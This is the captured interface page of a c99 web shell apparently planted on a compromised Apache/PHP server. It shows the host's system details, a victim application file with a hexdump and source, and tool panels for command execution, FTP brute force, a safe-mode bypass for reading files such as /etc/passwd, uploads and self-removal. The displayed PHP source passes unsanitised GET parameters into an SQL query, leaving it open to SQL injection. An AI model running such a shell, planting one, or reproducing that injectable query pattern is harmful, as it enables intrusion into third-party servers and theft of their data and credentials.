!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Plan_new/   drwxr-xr-x
Free 52.63 GB of 127.8 GB (41.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     getOrderListID.php (964 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage/Plan_new/getOrderListID.php
Size 964 B
MD5 4df7734b2f84ff095190682b7af5e108
Owner/Group apache/apache
Perms-rw-r--r--
Create time 11/09/2013 22:41:14
Access time 11/07/2024 12:53:30
MODIFY time 11/09/2013 22:41:14

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
3C 3F 20 0D 0A 09 68 65 61 64 65 72 28 20 22 45 78 70 69 72 65 73 3A 20
53 61 74 2C 20 31 20 4A 61 6E 20 32 30 30 35 20 30 30 3A 30 30 3A 30 30
20 47 4D 54 22 20 29 3B 0D 0A 09 68 65 61 64 65 72 28 20 22 4C 61 73 74
2D 4D 6F 64 69 66 69 65 64 3A 20 22 2E 67 6D 64 61 74 65 28 20 22 44 2C
20 64 20 4D 20 59 20 48 3A 69 3A 73 22 20 29 2E 22 47 4D 54 22 20 29 3B
0D 0A 09 68 65 61 64 65 72 28 20 22 43 61 63 68 65 2D 43 6F 6E 74 72 6F
6C 3A 20 6E 6F 2D 63 61 63 68 65 2C 20 6D 75 73 74 2D 72 65 76 61 6C 69
64 61 74 65 22 20 29 3B 0D 0A 09 68 65 61 64 65 72 28 20 22 50 72 61 67
6D 61 3A 20 6E 6F 2D 63 61 63 68 65 22 20 29 3B 0D 0A 09 68 65 61 64 65
72 28 20 22 63 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63
61 74 69 6F 6E 2F 78 2D 6A 61 76 61 73 63 72 69 70 74 3B 20 63 68 61 72
73 65 74 3D 55 54 46 2D 38 22 20 29 3B 0D 0A 09 0D 0A 09 69 6E 63 6C 75
64 65 5F 6F 6E 63 65 28 20 22 2E 2E 2F 63 6F 6E 66 69 67 75 72 61 74 69
6F 6E 2E 70 68 70 22 20 29 3B 0D 0A 09 69 6E 63 6C 75 64 65 5F 6F 6E 63
65 28 20 22 2E 2E 2F 69 6E 63 6C 75 64 65 73 2F 63 6F 6E 6E 4D 79 53 51
4C 2E 63 6C 61 73 73 2E 70 68 70 22 20 29 3B 0D 0A 09 0D 0A 09 24 62 75
64 67 65 74 20 3D 20 24 5F 47 45 54 5B 27 62 75 64 67 65 74 59 65 61 72
27 5D 3B 0D 0A 09 24 46 61 63 75 6C 74 79 5F 63 6F 64 65 20 3D 20 24 5F
47 45 54 5B 27 46 49 44 27 5D 3B 0D 0A 09 0D 0A 09 2F 2A 2A 20 20 43 72
65 61 74 65 20 44 61 74 61 62 61 73 65 20 4F 62 6A 65 63 74 20 20 2A 2F
0D 0A 09 24 63 6F 6E 6E 20 3D 20 6E 65 77 20 44 42 43 6F 6E 6E 3B 0D 0A
09 0D 0A 09 09 0D 0A 09 24 73 71 6C 20 3D 20 22 53 45 4C 45 43 54 20 2A
20 46 52 4F 4D 20 70 72 6F 6A 65 63 74 5F 74 79 70 65 5F 74 62 20 57 48
45 52 45 20 46 61 63 75 6C 74 79 5F 63 6F 64 65 3D 27 24 46 61 63 75 6C
74 79 5F 63 6F 64 65 27 20 61 6E 64 20 42 75 64 67 65 74 5F 59 65 61 72
20 3D 20 27 24 62 75 64 67 65 74 59 65 61 72 27 20 6F 72 64 65 72 20 62
79 20 4F 72 64 65 72 6C 69 73 74 20 44 45 53 43 22 3B 20 09 0D 0A 09 24
72 65 73 75 6C 74 20 3D 20 24 63 6F 6E 6E 2D 3E 65 78 65 63 51 75 65 72
79 28 24 73 71 6C 29 3B 20 0D 0A 09 24 64 61 74 61 20 3D 20 24 63 6F 6E
6E 2D 3E 66 65 74 63 68 4F 62 6A 65 63 74 28 24 72 65 73 75 6C 74 29 3B
0D 0A 09 0D 0A 09 24 6F 72 64 65 72 4C 69 73 74 49 44 20 3D 20 73 75 62
73 74 72 28 24 62 75 64 67 65 74 2C 2D 32 29 2E 22 22 2E 24 46 61 63 75
6C 74 79 5F 63 6F 64 65 2E 22 22 2E 28 28 6D 79 73 71 6C 5F 6E 75 6D 5F
72 6F 77 73 28 24 72 65 73 75 6C 74 29 29 3F 28 73 75 62 73 74 72 28 24
64 61 74 61 2D 3E 4F 72 64 65 72 6C 69 73 74 2C 34 29 2B 31 29 3A 22 30
31 22 29 3B 0D 0A 09 0D 0A 09 65 63 68 6F 20 22 3C 69 6E 70 75 74 20 6E
61 6D 65 3D 5C 22 4F 72 64 65 72 6C 69 73 74 5C 22 20 74 79 70 65 3D 5C
22 74 65 78 74 5C 22 20 69 64 3D 5C 22 4F 72 64 65 72 6C 69 73 74 5C 22
20 76 61 6C 75 65 3D 5C 22 24 6F 72 64 65 72 4C 69 73 74 49 44 5C 22 20
73 69 7A 65 3D 5C 22 38 5C 22 20 72 65 61 64 6F 6E 6C 79 3E 22 3B 0D 0A
0D 0A 3F 3E 		<?    header( "Expires: 
Sat, 1 Jan 2005 00:00:00
 GMT" );   header( "Last
-Modified: ".gmdate( "D,
 d M Y H:i:s" )."GMT" );
   header( "Cache-Contro
l: no-cache, must-revali
date" );   header( "Prag
ma: no-cache" );   heade
r( "content-type: applic
ation/x-javascript; char
set=UTF-8" );      inclu
de_once( "../configurati
on.php" );   include_onc
e( "../includes/connMySQ
L.class.php" );      $bu
dget = $_GET['budgetYear
'];   $Faculty_code = $_
GET['FID'];      /**  Cr
eate Database Object  */
   $conn = new DBConn;  
      $sql = "SELECT *
 FROM project_type_tb WH
ERE Faculty_code='$Facul
ty_code' and Budget_Year
 = '$budgetYear' order b
y Orderlist DESC";     $
result = $conn->execQuer
y($sql);    $data = $con
n->fetchObject($result);
      $orderListID = sub
str($budget,-2)."".$Facu
lty_code."".((mysql_num_
rows($result))?(substr($
data->Orderlist,4)+1):"0
1");      echo "<input n
ame=\"Orderlist\" type=\
"text\" id=\"Orderlist\"
 value=\"$orderListID\" 
size=\"8\" readonly>";  
  ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0095 ]--